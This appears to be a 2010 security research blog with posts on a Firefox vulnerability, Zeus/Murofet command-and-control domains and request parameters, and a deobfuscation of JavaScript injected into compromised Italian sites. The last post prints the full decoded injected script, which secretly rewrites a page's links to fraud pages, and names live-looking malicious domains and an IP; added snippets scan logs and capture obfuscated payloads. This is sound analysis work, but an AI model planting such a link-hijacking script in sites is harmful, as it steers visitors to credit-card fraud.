Thursday, October 28, 2010

CVE-2010-3765 - proof of concept - update

October 29, 2010 - UPDATE: the working exploit (according to the BugX blog):
http://bugix-security.blogspot.com/2010/10/firefox-exploitcve-2010-3765.html
   
October, 28 2010
For those who still do not know, the proof of concept for CVE-2010-3765 is the following:

More details at: https://bugzilla.mozilla.org/show_bug.cgi?id=607222. The issue seems resolved with Firefox 3.6.12.

As mentioned in some of my old posts, reading a Bugzilla repository is always a good thing:

http://extraexploit.blogspot.com/2010/02/firefox-36-0day-trying-to-find-more.html


Feedback is welcome.

Thursday, October 14, 2010

Some domains for the LICAT / Murofet / Trojan/ZBOT.B threat

Update (2 November): A deep and very interesting analysis from Trend Micro:
http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/file-patching_zbot_variants_-_zeus_2.0_levels_up__oct_2010_.pdf

Update (15 October): ThreatExpert has released the domain name generation algorithm for MUROFET/Licat:
http://blog.threatexpert.com/2010/10/domain-name-generator-for-murofet.html

(14 October)
I have found some new domains involved in this threat, as you can see in the following list:


The value 333 for the "s" URL parameter permits downloading what is recognized as Trojan/ZBot.B (Symantec name), while 111 stands for "get Zeus 2.1 (as named by Zeustracker) config file". The drop zone is requested with the following syntax:

<domainname>.<tld>/news/

This malware seems to use a C&C domain name generation approach similar to the one used by Conficker. For example, the latest domain (hsosqykotrpsapxb.com/news/?s=333) seems to have been registered for the malware activity of 14 October 2010, as reported by http://domain-daily.com/
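As an added example (not part of the original post), the following Node.js script scans constructed squid-style proxy log lines for the request syntax described above: a /news/ path with s=333 or s=111. The two malicious hosts are taken from the post's list and the hosting IP is the one reported further down; the 14-to-16-letter host shape is a heuristic observed from the listed domains, not a documented property of the generation algorithm.

```javascript
// Constructed squid-style log lines (not real traffic). The two odd-looking
// hosts come from the post's domain list; the rest are benign filler.
const SAMPLE_LOG = [
  "1287064800.123 1 10.0.0.5 TCP_MISS/200 512 GET http://hsosqykotrpsapxb.com/news/?s=333 - DIRECT/195.189.226.107 application/octet-stream",
  "1287064801.456 1 10.0.0.5 TCP_MISS/200 2048 GET http://xrfrpevxvjbimup.info/news/?s=111 - DIRECT/195.189.226.107 text/plain",
  "1287064802.789 1 10.0.0.7 TCP_MISS/200 8192 GET http://www.example.com/news/?s=333 - DIRECT/93.184.216.34 text/html",
  "1287064803.000 1 10.0.0.9 TCP_HIT/200 1024 GET http://www.example.org/index.html - NONE/- text/html",
].join("\n");

// Meaning of the "s" parameter as described in the post.
const STAGE = { "333": "trojan download (ZBot.B)", "111": "Zeus 2.1 config fetch" };
// Heuristic: the listed domains are a single 14-16 letter label plus TLD.
// Treat a match as an extra indicator, not as proof.
const DGA_LABEL = /^[a-z]{14,16}$/;
const HOSTING_IP = "195.189.226.107"; // address reported in the post

// Returns null for anything that does not follow the drop-zone syntax,
// otherwise a record describing which stage the request belongs to.
function classifyUrl(url) {
  let u;
  try { u = new URL(url); } catch { return null; }
  if (u.pathname !== "/news/") return null;
  const s = u.searchParams.get("s");
  if (!(s in STAGE)) return null;
  const labels = u.hostname.split(".");
  return {
    host: u.hostname,
    stage: STAGE[s],
    dgaLike: labels.length === 2 && DGA_LABEL.test(labels[0]),
  };
}

// Walks squid native-format lines: time elapsed client status size
// method url ident hierarchy/peer type.
function scanLog(text) {
  const hits = [];
  for (const line of text.split("\n")) {
    const f = line.trim().split(/\s+/);
    if (f.length < 9 || f[5] !== "GET") continue;
    const hit = classifyUrl(f[6]);
    if (!hit) continue;
    hit.client = f[2];
    hit.knownIp = f[8].endsWith("/" + HOSTING_IP);
    hits.push(hit);
  }
  return hits;
}
```

The third line shows why the path alone is a weak indicator: it matches, but neither the host shape nor the peer IP supports it.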
 

The following Anubis binary analysis submission shows the behaviour of this malware:
http://anubis.iseclab.org/?action=result&task_id=1215b9b1d959c52e4bdd0ff4a38062aa3&call=first

and the ThreatExpert analysis, with detection engine info:
http://www.threatexpert.com/report.aspx?md5=1e940baeb962042a6628f81c93aaecd1

The domains above seem to be hosted at the following IP address:
195.189.226.107
 

The following Robtex table can be used to retrieve other domains involved:
http://www.robtex.com/ip/195.189.226.107.html

Wednesday, October 6, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds ( and black hat seo ) – part 0.2

Trying to find some common factors in the pages included in the compromised sites (as indicated in the previous post, http://extraexploit.blogspot.com/2010/10/dollars-javascript-code-yet-another.html), there is evidence of a large number of sites that are suffering from the same problem. In particular, using keywords that are common to many of these malicious pages, you get the following results:

[screenshot: sshot002]
As well:

[screenshot: ssho001]
Yet another dork that retrieves a very similar URL format:
[screenshot: sshot003]
This reasonably confirms that this stuff is related to a big (and well organized) Black Hat SEO campaign. Many thanks to Edgar Tools and the author of JJEncode for their support.

Tuesday, October 5, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25, 2011 – Update:
a detailed analysis that also cites my post:
Internet Explorer exSploit Milk codes
http://utf-8.jp/public/20101106/avtokyo.pptx


October 5, 2010:

On the MDL forum I found a post in which a user (many thanks to Edgar) reported a strange JavaScript code injected into some Italian web sites. Specifically, the message is located at the following URL:
http://www.malwaredomainlist.com/forums/index.php?topic=4354.0
The reported code looks like the following screenshot:
[screenshot: dollarscode001]

At first look it appears to be nonsense code to anyone who is not a JavaScript guru, like me. So I decided to try to decode this very interesting code to find out what it does. The first step was to try some JavaScript alert() calls in the prologue code, so the first lines of code were modified as follows:
[screenshot: dollarscode002]
The blue pills show the places where the alert() calls have been placed. Executing this extract of the code, the alert call sequence generated these results:
[screenshots: dollarscode003 to dollarscode007]
The rest of the code deobfuscation is obtained by placing the code referenced by "Function()" inside a textarea, as follows:
[screenshot: dollarscode008]
The end of the obfuscated code must also be modified as shown:
[screenshot: dollarscode009]
Once this modified code is placed in a test HTML page and rendered by Firefox, the following deobfuscated jQuery code is obtained:
page_links = [];

// Register f to run on window load, whichever event API the browser offers.
function setGlobalOnLoad(f) {
    var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null;
    if (root) {
        if (root.addEventListener) root.addEventListener("load", f, false);
        else if (root.attachEvent) root.attachEvent("onload", f);
    } else {
        if (typeof window.onload == 'function') {
            var existing = window.onload;
            window.onload = function() {
                existing();
                f();
            };
        } else {
            window.onload = f;
        }
    }
}

// Cross-browser event binding helper.
function addHandler(object, event, handler) {
    if (typeof object.addEventListener != 'undefined')
        object.addEventListener(event, handler, false);
    else if (typeof object.attachEvent != 'undefined')
        object.attachEvent('on' + event, handler);
}

// Gate on the user agent (Google Toolbar, Chrome) and on the referrer.
if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer != '' || document.referrer.indexOf(document.domain) == -1) {
    var right_browser = 'yes';
} else {
    var right_browser = 'no';
}

function getCookie(c_name) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start != -1) {
            c_start = c_start + c_name.length + 1;
            c_end = document.cookie.indexOf(";", c_start);
            if (c_end == -1) c_end = document.cookie.length;
            return unescape(document.cookie.substring(c_start, c_end));
        }
    }
    return "";
}

// Fire for roughly one visit in five, and only if the 'c_first' cookie
// (set here with a one-year expiry) has not been seen before.
var c_index = Math.floor(Math.random() * 5);
var fcoo = getCookie('c_first');
var exdate = new Date();
exdate.setDate(exdate.getDate() + 365);
document.cookie = 'c_first' + "=" + escape('false') + ";expires=" + exdate.toUTCString();
if (c_index == 4 && fcoo != 'false' && right_browser == 'yes') {
    setGlobalOnLoad(function() {
        // Collect the hrefs of the links injected inside the 'mlk' block...
        var block = document.getElementById('mlk');
        var links = block.getElementsByTagName('A');
        for (var i = 0; i < links.length; i++) {
            page_links.push(links[i].href);
        }
        // ...and, on click, rewrite the target of every link on the page to one of them.
        var links = document.links;
        for (var i = 0; i < links.length; i++) {
            addHandler(links[i], "click", function(event) {
                var index = Math.floor(Math.random() * (page_links.length - 1));
                event.target.href = page_links[index];
            });
        }
    });
}
Update: the code was obfuscated using the following encoding script:
http://utf-8.jp/public/jjencode.html (Mowab, thank you very much for your support).
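The textarea trick above captures the second stage by hand; as an added example (not from the original post nor from JJEncode itself), the Node.js snippet below does the same thing programmatically. JJEncode obtains Function as (0)["constructor"]["constructor"], i.e. through Function.prototype.constructor, so that property is hooked rather than the global Function. The obfuscated sample is a constructed stand-in with the same two-stage Function(Function('return "..."')())() shape and a harmless payload; stage2_ran is a name chosen for the demonstration.

```javascript
// Added example: intercept what a jjencode-style wrapper hands to Function().
const captured = [];            // every source string passed to Function
const RealFunction = Function;  // original, kept for the harmless decoder stage

// jjencode's first stage is a body of the exact form  return "<string>"  that
// only unescapes the payload; it is allowed to run. Anything else (the real
// second stage) is recorded and replaced by a no-op, so it never executes.
const DECODER_ONLY = /^return\s*"(?:[^"\\]|\\.)*"$/;

function hookedFunction(...args) {
  const body = String(args[args.length - 1]);
  captured.push(body);
  if (DECODER_ONLY.test(body)) return RealFunction(body);
  return function () {};
}

// jjencode reaches Function as (0)["constructor"]["constructor"], which resolves
// through Function.prototype.constructor; reassigning the global Function would
// not be seen by that lookup, so the prototype property is what gets swapped.
function setConstructor(fn) {
  Object.defineProperty(Function.prototype, "constructor",
    { value: fn, writable: true, configurable: true });
}

// Constructed stand-in for the obfuscated sample (not the post's real code):
// same Function(Function('return "..."')())() shape, harmless payload.
const SAMPLE =
  'var $={};$.$=(0)["constructor"]["constructor"];' +
  '$.$($.$("return \\"globalThis.stage2_ran=true\\"")())();';

// Runs src under the hook and returns the body the outer Function() would
// have executed: the deobfuscated second stage.
function extractPayload(src) {
  captured.length = 0;
  setConstructor(hookedFunction);
  try {
    RealFunction(src)();
  } finally {
    setConstructor(RealFunction);  // always restore the prototype
  }
  return captured[captured.length - 1];
}
```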
The obtained code, at first sight, seems to be a loader for the href objects injected into the compromised web page (as shown above). In particular, the following line of code:
var block = document.getElementById('mlk');
is the assignment of the object that contains the links to the malicious HTML pages injected within the compromised hosts. In particular, all the servers listed and reported in the MDL post seem to reference URLs like these:
[screenshot: dollarscode010]
The injected HTML page leads to a site blacklisted for credit card fraud. In this case the compromised host analyzed is bisteccheriadabaffo.it. Calling, for example,
bisteccheriadabaffo.it/modules/com_easycaptcha/desert-highlands-golf-p-699.html
retrieves this page:
[screenshot: dollarscode011]
Clicking on one of the download buttons, a CAPTCHA request appears, as follows:
[screenshot: dollarscode012]
Clicking on the download button calls the following URL:
hzzzzp://turbo-speed-downloads.com/download.php?file=1506495%20Cranberry%20Highlands%20Golf%20Course%20gsm%20userschoise%2097%20302.rar

Following the download sequence, a message appears that entices the user to sign up in order to download the desired file:

[screenshot: dollarscode014]
Trying to sign up, a fake promotional message like this is shown:
[screenshot: dollarscode015]
The checkout action tries to contact this website
hxxxxps://purchase.shopeasydeals.com/
which is blacklisted for credit card fraud, as noted by the MyWOT scorecard:
http://www.mywot.com/en/scorecard/purchase.shopeasydeals.com
[screenshot: dollarscode016]
I think that the compromised hosts, as reported at the beginning of this post, have been used as a Black Hat SEO infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.